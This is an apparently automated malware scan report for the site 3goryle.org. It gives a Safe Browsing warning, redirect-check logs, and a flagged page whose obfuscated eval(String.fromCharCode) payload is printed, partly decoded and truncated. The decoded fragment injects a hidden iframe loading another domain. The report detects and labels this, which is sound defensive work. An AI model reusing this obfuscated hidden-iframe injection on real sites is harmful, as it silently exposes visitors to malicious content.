Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=3goryle.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://3goryle.org/ | 200 OK Content-Length: 7070 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://3goryle.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 3goryle.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Jul 2014 13:43:44 GMT
Accept-Ranges: bytes
ETag: "1b9e-4a9b2d86ae6c0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 7070
Content-Type: text/html
Last-Modified: Thu, 04 Aug 2011 19:18:27 GMT
X-Pad: avoid browser bug
...7070 bytes of data.
GET / HTTP/1.1
Host: 3goryle.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Jul 2014 13:43:44 GMT
Accept-Ranges: bytes
ETag: "1b9e-4a9b2d86ae6c0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 7070
Content-Type: text/html
Last-Modified: Thu, 04 Aug 2011 19:18:27 GMT
X-Pad: avoid browser bug
...7070 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 3goryle.org
Referer: http://www.google.com/search?q=3goryle.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 3goryle.org
Referer: http://www.google.com/search?q=3goryle.org
Result:
The result is similar to the first query. There are no suspicious redirects found.